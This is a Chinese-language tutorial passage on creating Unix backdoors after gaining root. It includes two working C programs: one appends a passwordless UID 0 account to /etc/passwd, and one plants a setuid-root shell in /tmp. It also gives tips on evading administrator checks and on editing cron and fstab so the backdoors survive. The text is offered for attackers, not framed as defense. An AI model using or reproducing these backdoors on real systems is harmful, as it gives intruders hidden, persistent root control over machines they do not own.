最簡單的方法，就是在口令文件 passwd 中增加一個(gè) UID 為 0 的帳號(hào)。但***別這么做，因?yàn)橹灰到y(tǒng)管理員檢查口令文件就會(huì)“漏餡”了。以下是在 /etc/passwd 口令文件中添加一個(gè) UID 0 帳號(hào)的C程序。

<++> backdoor/backdoor1.c
#include
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");
}
<-->

比這種方法稍微隱蔽一點(diǎn)的就是將藏在口令文件中某個(gè)無人使用帳號(hào)的 UID 改為 0，并將其第二個(gè)域（口令域）設(shè)為空。（注意，如果你使用的是較高版本的*nix，也許還要修改 /etc/shadow 文件。）

在 /tmp 目錄下放置 suid shell。以后只要你運(yùn)行這個(gè)程序，就會(huì)輕易得到根用戶權(quán)限。這種方法幾乎是***的了。但有許多系統(tǒng)每幾小時(shí)，或者每次啟動(dòng)都會(huì)清除 /tmp 目錄下的數(shù)據(jù)，另外一些系統(tǒng)則根本不允許運(yùn)行 /tmp 目錄下的 suid 程序。當(dāng)然，你可以自己修改或清除這些限制（因?yàn)槟阋咽歉脩?，有?quán)限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件）。以下是在 /tmp 目錄下放置 suid shell 程序的C源程序。

<++> backdoor/backdoor2.c
#include
main()
{
system("cp /bin/sh /tmp/fid");
system("chown root.root /tmp/fid");
system("chmod 4755 /tmp/fid");
}
<-->

【編輯推薦】

1. 創(chuàng)建UNIX后門(中級(jí)篇)
2. 創(chuàng)建UNIX后門(高級(jí)篇)